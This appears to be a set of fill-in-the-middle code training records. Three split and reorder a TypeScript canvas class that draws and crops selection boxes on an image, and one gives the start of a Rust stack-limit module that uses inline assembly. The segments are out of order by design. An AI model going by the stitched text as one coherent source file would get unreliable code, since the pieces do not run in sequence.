var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e); | myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | // We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx; | random_line_split |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
constructor(canvas) |
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
} | identifier_body |
CanvasState.ts | import Shape from './Shape'
import * as $ from 'jquery'
export default class CanvasState {
canvas:any;
width:number;
height:number;
ctx:any;
stylePaddingLeft:number;
stylePaddingTop:number;
styleBorderLeft:number;
styleBorderTop:number;
htmlTop : number;
htmlLeft:number;
valid:boolean;
alert:boolean;
dragging:boolean;
drawing:boolean;
selection: any;
dragoffx:number;
dragoffy:number;
drawingoffx:number;
drawingoffy:number;
shapes:Array<Shape>;
selectionColor:string;
selectionWidth:number;
interval:number;
imageObj:any;
border:number;
scale:number;
handleParentScroll:boolean;
onAddShape: (shape:Shape) => void;
| (canvas) {
// **** First some setup! ****
this.canvas = canvas;
this.width = canvas.width;
this.height = canvas.height;
this.ctx = canvas.getContext('2d');
// This complicates things a little but but fixes mouse co-ordinate problems
// when there's a border or padding. See getMouse for more detail
var stylePaddingLeft, stylePaddingTop, styleBorderLeft, styleBorderTop;
if (document.defaultView && document.defaultView.getComputedStyle) {
this.stylePaddingLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingLeft'], 10) || 0;
this.stylePaddingTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['paddingTop'], 10) || 0;
this.styleBorderLeft = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderLeftWidth'], 10) || 0;
this.styleBorderTop = parseInt(document.defaultView.getComputedStyle(canvas, null)['borderTopWidth'], 10) || 0;
}
this.border = 1 ;
// Some pages have fixed-position bars (like the stumbleupon bar) at the top or left of the page
// They will mess up mouse coordinates and this fixes that
var html = document.body.parentElement;
this.htmlTop = html.offsetTop;
this.htmlLeft = html.offsetLeft;
this.handleParentScroll = false ;
// **** Keep track of state! ****
this.valid = false; // when set to false, the canvas will redraw everything
this.shapes = []; // the collection of things to be drawn
this.dragging = false; // Keep track of when we are dragging
this.drawing = false; // Keep track of when we are drawing
// the current selected object. In the future we could turn this into an array for multiple selection
this.selection = null;
this.dragoffx = 0; // See mousedown and mousemove events for explanation
this.dragoffy = 0;
// This is an example of a closure!
// Right here "this" means the CanvasState. But we are making events on the Canvas itself,
// and when the events are fired on the canvas the variable "this" is going to mean the canvas!
// Since we still want to use this particular CanvasState in the events we have to save a reference to it.
// This is our reference!
var myState = this;
myState.alert = false;
// **** Options! ****
this.selectionColor = '#CC0000';
this.selectionWidth = 2;
this.interval = 10;
setInterval(function () { myState.draw(); }, myState.interval);
}
registerListeners = () => {
var myState = this;
var canvas = this.canvas;
//fixes a problem where double clicking causes text to get selected on the canvas
canvas.addEventListener('selectstart', function (e) { e.preventDefault(); return false; }, false);
// Up, down, and move are for dragging
canvas.addEventListener('mousedown', function (e) {
if (myState.imageObj !== false && myState.imageObj.width + 2 * myState.border != canvas.width) {
myState.dragging = false;
myState.drawing = false;
if (myState.alert == false) {
alert('La sélection de zone n\'est possible que si le zoom est désactivé !');
myState.alert = true;
}
} else {
var mouse = myState.getMouse(e);
var mx = mouse.x;
var my = mouse.y;
var shapes = myState.shapes;
var l = shapes.length;
for (var i = l - 1; i >= 0; i--) {
if (shapes[i].contains(mx, my, myState.scale)) {
var mySel = shapes[i];
// Keep track of where in the object we clicked
// so we can move it smoothly (see mousemove)
myState.dragoffx = mx - mySel.x;
myState.dragoffy = my - mySel.y;
myState.dragging = true;
myState.selection = mySel;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false;
return;
}
}
// havent returned means we have failed to select anything.
// If there was an object selected, we deselect it
if (myState.selection) {
myState.selection = null;
console.log('Selection : ') ;
console.log(myState.selection) ;
myState.valid = false; // Need to clear the old selection border
}
myState.drawing = true;
myState.drawingoffx = mx;
myState.drawingoffy = my;
}
}, true);
canvas.addEventListener('mousemove', function (e) {
if (myState.dragging) {
var mouse = myState.getMouse(e);
// We don't want to drag the object by its top-left corner, we want to drag it
// from where we clicked. Thats why we saved the offset and use it here
myState.selection.x = mouse.x - myState.dragoffx;
myState.selection.y = mouse.y - myState.dragoffy;
myState.valid = false; // Something's dragging so we must redraw
} else if (myState.drawing) {
var mouse = myState.getMouse(e);
// Add temp shape
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, 'rgba(0,255,0,.6)');
_shape.temp = true;
myState.addShape(_shape);
}
}, true);
canvas.addEventListener('mouseup', function (e) {
if (myState.drawing === true) {
var mouse = myState.getMouse(e);
var _h = Math.abs(mouse.y - myState.drawingoffy);
var _w = Math.abs(mouse.x - myState.drawingoffx);
if (_w > 120 && _h > 17) {
var _shape = new Shape(myState.drawingoffx, myState.drawingoffy, _w, _h, mouse.y, false);
myState.addShape(_shape);
} else {
myState.removeTempShape();
}
myState.valid = false; // Need to clear the old selection border
}
myState.dragging = false;
myState.drawing = false;
}, true);
}
removeTempShape = () => {
var _shapes = [];
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
}
addShape = (shape:Shape) => {
var _shapes = [];
var _nextRef = 1;
this.shapes = this.shapes.sort(function (a, b) {
if (a.ref < b.ref) {
return -1;
} else if (a.ref > b.ref) {
return 1;
} else {
return 0;
}
});
// compute the next reference
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
var _ref = this.shapes[i].ref;
if (_nextRef < _ref) {
break;
} else if (_ref >= _nextRef) {
_nextRef = _ref + 1;
}
}
}
// prepare the new data
for (var i in this.shapes) {
if (this.shapes[i].temp !== true) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
shape.ref = _nextRef;
if(this.onAddShape && shape.temp === false) {
this.onAddShape(shape) ;
}
this.shapes.push(shape);
if (shape.temp !== true) {
// -> binded shapes
}
this.selection = null;
console.log('On AddShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
cropShape = (shape:Shape) => {
//Find the part of the image that is inside the crop box
var crop_canvas,
left = shape.x,
top = shape.y,
width = shape.w,
height = shape.h;
crop_canvas = document.createElement('canvas');
crop_canvas.width = width;
crop_canvas.height = height;
try {
crop_canvas.getContext('2d').drawImage(this.imageObj,
left - this.border, top - this.border, width, height, 0, 0, width, height);
return crop_canvas.toDataURL("image/png");
} catch (error) {
alert('La sélection de zone ' + shape.ref + ' dépasse les limites de l\'ordonnance !');
return null;
}
}
removeShape = (shape:Shape) => {
var _shapes = [];
for (var i in this.shapes) {
if (!(shape.x == this.shapes[i].x
&& shape.y == this.shapes[i].y
&& shape.w == this.shapes[i].w
&& shape.h == this.shapes[i].h)) {
_shapes.push(this.shapes[i]);
}
}
this.shapes = _shapes;
// -> binde shapes
this.selection = null;
console.log('On RemoveShape -> Selection : ') ;
console.log(this.selection) ;
this.valid = false;
}
clear = () => {
this.ctx.clearRect(0, 0, this.width, this.height);
}
drawImage = () => {
var WIDTH = this.imageObj.width + 2 * this.border;
var HEIGHT = this.imageObj.height + 2 * this.border;
this.canvas.width = WIDTH * this.scale;
this.canvas.height = HEIGHT * this.scale;
this.canvas.getContext('2d').scale(this.scale, this.scale);
this.width = this.canvas.width;
this.height = this.canvas.height;
}
// While draw is called as often as the INTERVAL variable demands,
// It only ever does something if the canvas gets invalidated by our code
draw = () => {
// if our state is invalid, redraw and validate!
if (!this.valid) {
var ctx = this.ctx;
this.drawImage() ;
var shapes = this.shapes;
this.clear();
if (this.imageObj !== false && this.imageObj != undefined) {
if (this.border) {
ctx.stroke();
ctx.rect(0, 0, this.width, this.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = this.border;
}
// ** Add stuff you want drawn in the background all the time here **
ctx.drawImage(this.imageObj, this.border, this.border);
}
// draw all shapes
var l = shapes.length;
var _oneShapeDraw = false;
for (var i = 0; i < l; i++) {
var shape = shapes[i];
// We can skip the drawing of elements that have moved off the screen:
if (shape == undefined || shape.hide || (typeof shape.draw != "function") || shape.x > this.width || shape.y > this.height ||
shape.x + shape.w < 0 || shape.y + shape.h < 0) {
// Shape not to be drawed
continue;
}
shape.draw(ctx);
_oneShapeDraw = true;
}
// draw selection
// right now this is just a stroke along the edge of the selected Shape
if (_oneShapeDraw && this.selection != null) {
ctx.strokeStyle = this.selectionColor;
ctx.lineWidth = this.selectionWidth;
var mySel = this.selection;
ctx.strokeRect(mySel.x, mySel.y, mySel.w, mySel.h);
}
// ** Add stuff you want drawn on top all the time here **
this.valid = true;
}
}
// Creates an object with x and y defined, set to the mouse position relative to the state's canvas
// If you wanna be super-correct this can be tricky, we have to worry about padding and borders
getMouse = (e) => {
var element = this.canvas, offsetX = 0, offsetY = 0, mx, my;
// Compute the total offset
if (element.offsetParent !== undefined) {
do {
offsetX += element.offsetLeft;
offsetY += element.offsetTop;
} while ((element = element.offsetParent));
}
// Add padding and border style widths to offset
// Also add the <html> offsets in case there's a position:fixed bar
offsetX += this.stylePaddingLeft + this.styleBorderLeft + this.htmlLeft;
offsetY += this.stylePaddingTop + this.styleBorderTop + this.htmlTop;
var scrollY = 0 ;
if(this.handleParentScroll === true) {
element = this.canvas
do {
scrollY = $(element).scrollTop() ;
} while (scrollY == 0 && (element = element.parentNode));
}
mx = e.pageX - offsetX;
my = e.pageY + scrollY - offsetY;
// We return a simple javascript object (a hash) with x and y defined
return { x: mx, y: my };
}
} | constructor | identifier_name |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
